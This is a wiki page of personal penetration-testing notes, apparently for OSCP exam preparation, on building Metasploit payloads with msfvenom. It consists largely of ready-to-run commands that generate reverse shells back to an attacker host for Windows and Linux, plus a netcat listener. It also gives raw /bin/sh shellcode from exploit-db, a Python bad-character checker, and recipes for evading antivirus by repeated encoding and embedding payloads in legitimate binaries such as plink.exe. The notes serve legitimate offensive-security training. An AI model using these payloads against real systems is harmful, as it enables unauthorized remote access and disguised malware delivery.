msf payloads
lethanhtung01011980 edited this page Apr 22, 2020
- To create MSF payloads
- Allowed in exam
- Web full shell: https://github.com/lethanhtung01011980/Notes/wiki/Create-reverse-shell-payload
- To avoid AV: https://github.com/inquisb/shellcodeexec/blob/master/README.md
BufferRegister tells msfencode that we have already taken care of finding the shellcode's absolute address and saved it in the named register (see `BufferRegister=EAX` in the windows/exec example below).
To avoid bad characters, list them with `-b`:
- `-b "\x00\x0a\x0d\x20"`
- `msfvenom -p linux/x86/shell_reverse_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai`
- Default in MSF is staged payload.
- List payloads: `msfvenom -l payload`
- To filter payloads: `msfvenom -l payload | grep linux | grep shell_reverse_tcp`
- To list formats: `msfvenom -l format`
- `sessions 1` (interact with session 1 in msfconsole), then `shell` to drop to a system shell
Non-staged: payload in one go, e.g. windows/shell_reverse_tcp
- Listener: `nc -lnvp`
- `msfvenom -p windows/shell_reverse_tcp LHOST=attacker_ip LPORT=5678 -f python -o shell_reverse_nonstaged.py`
Staged: payload in two parts, e.g. windows/shell/reverse_tcp
- Use multi-handler: here
- `msfvenom -p windows/shell/reverse_tcp LHOST=attacker_ip LPORT=5678 -f python -o shell_reverse_staged.py`
For Windows
- windows/x64/shell_reverse_tcp
- windows/shell_reverse_tcp
For Linux
- linux/x64/shell_reverse_tcp
- linux/x86/shell_reverse_tcp
- linux/x64/shell/reverse_tcp
- linux/x86/shell/reverse_tcp
- Windows: `msfvenom -p windows/shell_reverse_tcp LHOST=attacker_ip LPORT=5678 -f python -o shell_reverse_nonstaged.py`
- Linux: `msfvenom -p linux/x86/shell_reverse_tcp LHOST=attacker_ip LPORT=5678 -f python -o shell_reverse_nonstaged.py`
- Output format: `-f python`, `-f c`, ...
- Payload to execute a command: `msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python`
Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)
- https://www.exploit-db.com/exploits/34060
```
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x31\xc9\xcd\x80"
```
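The `-b` list above only works if you can confirm the encoder actually removed every listed byte from the final buffer. This added Python example (not part of the original wiki page or of msfvenom) reads a buffer written in the layout of msfvenom's `-f python` output, reports its length, and lists the offset of every bad character. The `buf += b"..."` text below was typed for this example; the byte values inside it are the 50-byte socket re-use shellcode listed above, which contains none of the bytes from the page's `-b "\x00\x0a\x0d\x20"`, so the check reports a clean buffer. A second, constructed 5-byte buffer shows what a hit looks like.

```python
import re
from collections import defaultdict

# Constructed sample in the layout msfvenom prints for "-f python"
# (typed for this example, not captured from msfvenom). The bytes are the
# Linux/x86 execve(/bin/sh) + socket re-use shellcode from exploit-db 34060.
SAMPLE_PYTHON_FORMAT = r'''
buf =  b""
buf += b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
buf += b"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
buf += b"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
buf += b"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
buf += b"\x89\xe3\x31\xc9\xcd\x80"
'''

# The bad-character string exactly as it is passed to "-b" on this page.
DEFAULT_BADCHARS = r"\x00\x0a\x0d\x20"

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
_BYTES_LITERAL = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})*)"')


def parse_escape_string(s: str) -> bytes:
    """Convert a run of \\xHH escapes (the -b argument, or one literal) to bytes."""
    return bytes(int(h, 16) for h in _HEX_ESCAPE.findall(s))


def parse_python_format(text: str) -> bytes:
    """Reassemble the payload from msfvenom-style 'buf += b"..."' lines."""
    return b"".join(parse_escape_string(lit) for lit in _BYTES_LITERAL.findall(text))


def find_bad_chars(payload: bytes, badchars: bytes) -> dict:
    """Map each bad byte present in payload to the list of offsets where it occurs."""
    hits = defaultdict(list)
    bad = set(badchars)
    for offset, value in enumerate(payload):
        if value in bad:
            hits[value].append(offset)
    return dict(hits)


def report(payload: bytes, badchars: bytes) -> str:
    """Human-readable summary: length plus any bad characters and their offsets."""
    hits = find_bad_chars(payload, badchars)
    if not hits:
        return f"{len(payload)} bytes, no bad characters"
    parts = ", ".join(f"\\x{b:02x} at {offs}" for b, offs in sorted(hits.items()))
    return f"{len(payload)} bytes, bad characters found: {parts}"


if __name__ == "__main__":
    bad = parse_escape_string(DEFAULT_BADCHARS)
    print(report(parse_python_format(SAMPLE_PYTHON_FORMAT), bad))
    # Constructed buffer containing a NUL and a space, to show a hit.
    print(report(b"\x31\xc0\x00\x20\x90", bad))
```

Run it against the real `-f python` output after encoding (`-e x86/shikata_ga_nai -b ...`): if `find_bad_chars` returns anything, the encoder did not achieve what `-b` asked for and the payload will be mangled in transit.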
Windows
- Windows x86: `msfvenom -p windows/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port EXITFUNC=thread -f exe -a x86 --platform windows -o win_shell_reverse_nonstaged.exe`
- Windows x64: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port EXITFUNC=thread -f exe -a x64 --platform windows -o win_shell_reverse_nonstaged.exe`
Linux
- Linux x86: `msfvenom -p linux/x86/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port EXITFUNC=thread -f elf -o linux_shell_reverse_nonstaged`
- Linux x64: `msfvenom -p linux/x64/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port EXITFUNC=thread -f elf -o linux_shell_reverse_nonstaged`
- Windows paths in meterpreter must use `\\`: `meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
- Or wrap the path in double quotes instead of doubling the backslashes: `meterpreter > download "c:\Windows\system32\calc.exe" /tmp/calc.exe`
To avoid AV detection (encode with multiple iterations and embed in an existing binary):
- `msfvenom -p windows/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe`
- `msfvenom -p windows/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x calc.exe -o shell_reverse_msf_encoded_embedded.exe`